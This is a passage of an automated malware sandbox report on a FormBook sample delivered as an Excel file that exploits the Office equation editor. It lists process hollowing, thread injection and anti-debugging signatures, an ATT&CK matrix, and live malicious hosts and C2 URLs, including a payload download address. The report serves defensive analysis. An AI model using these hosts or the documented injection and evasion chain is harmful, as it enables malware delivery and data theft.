          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 5_2_013B558A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,5_2_013B558A
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 5_2_013B1D17 GetProcessHeap,5_2_013B1D17
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_00408E70 rdtsc 6_2_00408E70
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\wuapp.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036D0559 mov edx, dword ptr fs:[00000030h]2_2_036D0559
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 5_2_001103F8 mov eax, dword ptr fs:[00000030h]5_2_001103F8
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 5_2_0011061D mov eax, dword ptr fs:[00000030h]5_2_0011061D
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 5_2_001106F7 mov eax, dword ptr fs:[00000030h]5_2_001106F7
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 5_2_00110736 mov eax, dword ptr fs:[00000030h]5_2_00110736
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 5_2_00110772 mov eax, dword ptr fs:[00000030h]5_2_00110772
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_008726F8 mov eax, dword ptr fs:[00000030h]6_2_008726F8
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01EB26F8 mov eax, dword ptr fs:[00000030h]8_2_01EB26F8
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\wuapp.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_0040A0E0 LdrLoadDll,6_2_0040A0E0
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 5_2_013B439B SetUnhandledExceptionFilter,5_2_013B439B
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 5_2_013B43CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_013B43CC
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_013B439B SetUnhandledExceptionFilter,6_2_013B439B
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_013B43CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_013B43CC

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 23.81.214.26 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.arjimni.com
          Source: C:\Windows\explorer.exeDomain query: www.tw-life.net
          Source: C:\Windows\explorer.exeDomain query: www.contractornurd.com
          Source: C:\Windows\explorer.exeDomain query: www.yiwanggkm.com
          Source: C:\Windows\explorer.exeNetwork Connect: 164.155.217.57 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.212 80Jump to behavior
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeSection unmapped: C:\Windows\SysWOW64\wuapp.exe base address: 8E0000Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeSection loaded: unknown target: C:\Windows\SysWOW64\wuapp.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeSection loaded: unknown target: C:\Windows\SysWOW64\wuapp.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\wuapp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\wuapp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Injects a PE file into a foreign processes
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeMemory written: C:\Users\user\AppData\Local\Temp\yldnat.exe base: 400000 value starts with: 4D5AJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeThread register set: target process: 1860Jump to behavior
          Source: C:\Windows\SysWOW64\wuapp.exeThread register set: target process: 1860Jump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgnaJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeProcess created: C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgnaJump to behavior
          Source: C:\Windows\SysWOW64\wuapp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\yldnat.exe"Jump to behavior
          Source: explorer.exe, 00000007.00000000.1003147804.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.988533014.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1014113528.0000000000830000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000007.00000000.1002666378.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1003147804.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.988533014.0000000000830000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000007.00000000.1003147804.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.988533014.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1014113528.0000000000830000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager<
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 5_2_013B3283 cpuid 5_2_013B3283
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 5_2_013B3EC8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,5_2_013B3EC8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_00403646

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 6.0.yldnat.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.yldnat.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.yldnat.exe.120000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.yldnat.exe.120000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.yldnat.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.yldnat.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.yldnat.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.yldnat.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.yldnat.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.1175423013.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.1175517654.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.983399787.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.982109510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.1012975505.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1032166526.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.1024425011.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1032081329.00000000000C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.981158681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 6.0.yldnat.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.yldnat.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.yldnat.exe.120000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.yldnat.exe.120000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.yldnat.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.yldnat.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.yldnat.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.yldnat.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.yldnat.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.1175423013.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.1175517654.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.983399787.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.982109510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.1012975505.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1032166526.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.1024425011.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1032081329.00000000000C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.981158681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Scripting          		Path Interception1
          Access Token Manipulation          		111
          Masquerading          		OS Credential Dumping1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default Accounts11
          Native API          		Boot or Logon Initialization Scripts612
          Process Injection          		2
          Virtualization/Sandbox Evasion          		LSASS Memory251
          Security Software Discovery          		Remote Desktop Protocol1
          Clipboard Data          		Exfiltration Over Bluetooth35
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain Accounts1
          Shared Modules          		Logon Script (Windows)Logon Script (Windows)1
          Access Token Manipulation          		Security Account Manager2
          Virtualization/Sandbox Evasion          		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local Accounts23
          Exploitation for Client Execution          		Logon Script (Mac)Logon Script (Mac)612
          Process Injection          		NTDS2
          Process Discovery          		Distributed Component Object ModelInput CaptureScheduled Transfer123
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information          		LSA Secrets1
          Remote System Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          Scripting          		Cached Domain Credentials2
          File and Directory Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items2
          Obfuscated Files or Information          		DCSync116
          System Information Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
          Software Packing          		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 626601 Sample: DL03327INV.xlsx Startdate: 14/05/2022 Architecture: WINDOWS Score: 100 46 www.skinclash.com 2->46 48 traff-6.hugedomains.com 2->48 50 hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com 2->50 66 Snort IDS alert for network traffic 2->66 68 Found malware configuration 2->68 70 Malicious sample detected (through community Yara rule) 2->70 72 12 other signatures 2->72 12 EQNEDT32.EXE 12 2->12         started        17 EXCEL.EXE 34 26 2->17         started        signatures3 process4 dnsIp5 52 104.168.33.31, 49173, 80 AS-COLOCROSSINGUS United States 12->52 40 C:\Users\user\AppData\Local\...\vbc[1].exe, PE32 12->40 dropped 42 C:\Users\Public\vbc.exe, PE32 12->42 dropped 92 Office equation editor establishes network connection 12->92 94 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 12->94 19 vbc.exe 19 12->19         started        44 C:\Users\user\Desktop\~$DL03327INV.xlsx, data 17->44 dropped file6 signatures7 process8 file9 38 C:\Users\user\AppData\Local\Temp\yldnat.exe, PE32 19->38 dropped 74 Multi AV Scanner detection for dropped file 19->74 76 Machine Learning detection for dropped file 19->76 23 yldnat.exe 19->23         started        signatures10 process11 signatures12 78 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 23->78 80 Tries to detect virtualization through RDTSC time measurements 23->80 82 Injects a PE file into a foreign processes 23->82 26 yldnat.exe 23->26         started        process13 signatures14 84 Modifies the context of a thread in another process (thread injection) 26->84 86 Maps a DLL or memory area into another process 26->86 88 Sample uses process hollowing technique 26->88 90 Queues an APC in another process (thread injection) 26->90 29 explorer.exe 26->29 injected process15 dnsIp16 54 www.yiwanggkm.com 23.81.214.26, 49177, 80 LEASEWEB-USA-SEA-10US United States 29->54 56 www.tw-life.net 164.155.217.57, 49176, 80 IKGUL-26484US South Africa 29->56 58 4 other IPs or domains 29->58 96 System process connects to network (likely due to code injection or exploit) 29->96 33 wuapp.exe 29->33         started        signatures17 process18 signatures19 60 Modifies the context of a thread in another process (thread injection) 33->60 62 Maps a DLL or memory area into another process 33->62 64 Tries to detect virtualization through RDTSC time measurements 33->64 36 cmd.exe 33->36         started        process20

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          DL03327INV.xlsx38%VirustotalBrowse
          DL03327INV.xlsx27%ReversingLabsDocument-OLE.Exploit.CVE-2018-0802

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\Public\vbc.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe51%ReversingLabsWin32.Trojan.FormBook
          C:\Users\Public\vbc.exe51%ReversingLabsWin32.Trojan.FormBook

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          6.2.yldnat.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.2.yldnat.exe.120000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.3.EQNEDT32.EXE.6af7ba.0.unpack100%AviraTR/Patched.Ren.GenDownload File
          6.0.yldnat.exe.400000.9.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          6.0.yldnat.exe.400000.5.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          6.0.yldnat.exe.400000.7.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.tw-life.net0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.yiwanggkm.com/nc39/?dZzp=SW2DOu4AoD1tt2PaEEhiNvSk2qD2OpQeAcSR0NEUE8SsNGniN/+F24NqGXKX7Cj1ljS/6Q==&3f=j6AdrVwh0%Avira URL Cloudsafe
          http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
          http://www.tw-life.net/nc39/?dZzp=Td3Z6WACWlvn2oxJ5kz3cAAvTYM+vx9a0mv4ko18Io/mhbtUurGZKYFJi0A4+N8FDsGh8g==&3f=j6AdrVwh0%Avira URL Cloudsafe
          www.arjimni.com/nc39/100%Avira URL Cloudmalware
          http://www.arjimni.com/nc39/?dZzp=SWFeU2CogosqNHNVddu3ZSSiHhx9YO5iIr2cqOlbYRvwZbqC6rJ+ufxHmetPGTnqGTEg+w==&3f=j6AdrVwh100%Avira URL Cloudmalware
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://104.168.33.31/75/vbc.exehhC:0%Avira URL Cloudsafe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
          http://treyresearch.net0%URL Reputationsafe
          http://java.sun.com0%URL Reputationsafe
          http://www.icra.org/vocabulary/.0%URL Reputationsafe
          http://104.168.33.31/75/vbc.exe100%Avira URL Cloudmalware
          http://104.168.33.31/75/vbc.exej0%Avira URL Cloudsafe
          http://computername/printers/printername/.printer0%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.contractornurd.com/nc39/?dZzp=CWrF3poHj2MNQw4FqfZfOWFDC9Dy9qwGAafxJUMNhkwMJpF8RUBmV1WHKbaf9sKHKobluA==&3f=j6AdrVwh100%Avira URL Cloudmalware
          http://servername/isapibackend.dll0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.tw-life.net
          		164.155.217.57
          		truetrueunknown
          parkingpage.namecheap.com
          		198.54.117.212
          		truefalse
            		high
            www.yiwanggkm.com
            		23.81.214.26
            		truetrue
              		unknown
              hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com
              		18.119.154.66
              		truefalse
                		high
                arjimni.com
                		34.102.136.180
                		truefalse
                  		unknown
                  www.arjimni.com
                  		unknown
                  		unknowntrue
                    		unknown
                    www.contractornurd.com
                    		unknown
                    		unknowntrue
                      		unknown
                      www.skinclash.com
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://www.yiwanggkm.com/nc39/?dZzp=SW2DOu4AoD1tt2PaEEhiNvSk2qD2OpQeAcSR0NEUE8SsNGniN/+F24NqGXKX7Cj1ljS/6Q==&3f=j6AdrVwhtrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.tw-life.net/nc39/?dZzp=Td3Z6WACWlvn2oxJ5kz3cAAvTYM+vx9a0mv4ko18Io/mhbtUurGZKYFJi0A4+N8FDsGh8g==&3f=j6AdrVwhtrue
                        • Avira URL Cloud: safe
                        		unknown
                        www.arjimni.com/nc39/true
                        • Avira URL Cloud: malware
                        		low
                        http://www.arjimni.com/nc39/?dZzp=SWFeU2CogosqNHNVddu3ZSSiHhx9YO5iIr2cqOlbYRvwZbqC6rJ+ufxHmetPGTnqGTEg+w==&3f=j6AdrVwhfalse
                        • Avira URL Cloud: malware
                        		unknown
                        http://104.168.33.31/75/vbc.exetrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://www.contractornurd.com/nc39/?dZzp=CWrF3poHj2MNQw4FqfZfOWFDC9Dy9qwGAafxJUMNhkwMJpF8RUBmV1WHKbaf9sKHKobluA==&3f=j6AdrVwhtrue
                        • Avira URL Cloud: malware
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.windows.com/pctv.explorer.exe, 00000007.00000000.993545742.0000000003B10000.00000002.00000001.00040000.00000000.sdmpfalse
                          		high
                          http://investor.msn.comexplorer.exe, 00000007.00000000.993545742.0000000003B10000.00000002.00000001.00040000.00000000.sdmpfalse
                            		high
                            http://www.msnbc.com/news/ticker.txtexplorer.exe, 00000007.00000000.993545742.0000000003B10000.00000002.00000001.00040000.00000000.sdmpfalse
                              		high
                              http://wellformedweb.org/CommentAPI/explorer.exe, 00000007.00000000.1019001210.00000000046D0000.00000002.00000001.00040000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.iis.fhg.de/audioPAexplorer.exe, 00000007.00000000.1019001210.00000000046D0000.00000002.00000001.00040000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.piriform.com/ccleanerqexplorer.exe, 00000007.00000000.1015998007.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1071039162.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.992782338.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1004984463.0000000002CBF000.00000004.00000001.00020000.00000000.sdmpfalse
                                		high
                                http://www.piriform.com/ccleaner1SPS0explorer.exe, 00000007.00000000.1011703149.0000000008611000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1000245149.0000000008611000.00000004.00000001.00020000.00000000.sdmpfalse
                                  		high
                                  http://104.168.33.31/75/vbc.exehhC:EQNEDT32.EXE, 00000002.00000002.971169653.000000000061F000.00000004.00000020.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://nsis.sf.net/NSIS_ErrorErrorvbc.exe, 00000004.00000000.968426551.000000000040A000.00000008.00000001.01000000.00000004.sdmp, vbc.exe, 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmp, vbc.exe.2.dr, vbc[1].exe.2.drfalse
                                    		high
                                    http://windowsmedia.com/redir/services.asp?WMPFriendly=trueexplorer.exe, 00000007.00000000.1005695015.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.hotmail.com/oeexplorer.exe, 00000007.00000000.993545742.0000000003B10000.00000002.00000001.00040000.00000000.sdmpfalse
                                      		high
                                      http://treyresearch.netexplorer.exe, 00000007.00000000.1019001210.00000000046D0000.00000002.00000001.00040000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkexplorer.exe, 00000007.00000000.1005695015.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpfalse
                                        		high
                                        http://java.sun.comexplorer.exe, 00000007.00000000.1002666378.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1013668691.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.987463159.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1069523800.0000000000335000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.icra.org/vocabulary/.explorer.exe, 00000007.00000000.1005695015.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.explorer.exe, 00000007.00000000.1070008053.0000000001DD0000.00000002.00000001.00040000.00000000.sdmpfalse
                                          		high
                                          http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000007.00000000.1022834782.0000000008512000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1023411873.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1000541349.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1023540631.0000000008807000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1018121045.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1074287002.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.999862011.0000000008512000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1069574104.00000000003A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.995167898.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1007078757.0000000004385000.00000004.00000001.00020000.00000000.sdmpfalse
                                            		high
                                            http://investor.msn.com/explorer.exe, 00000007.00000000.993545742.0000000003B10000.00000002.00000001.00040000.00000000.sdmpfalse
                                              		high
                                              http://www.piriform.com/ccleanerexplorer.exe, 00000007.00000000.1022782803.00000000084C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1023411873.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1015998007.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1000541349.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1023540631.0000000008807000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1071039162.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.992782338.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1018121045.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1074287002.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.999862011.0000000008512000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1069574104.00000000003A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.995167898.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1004984463.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1007078757.0000000004385000.00000004.00000001.00020000.00000000.sdmpfalse
                                                		high
                                                http://104.168.33.31/75/vbc.exejEQNEDT32.EXE, 00000002.00000002.972741377.00000000036D0000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: safe
                                                		unknown
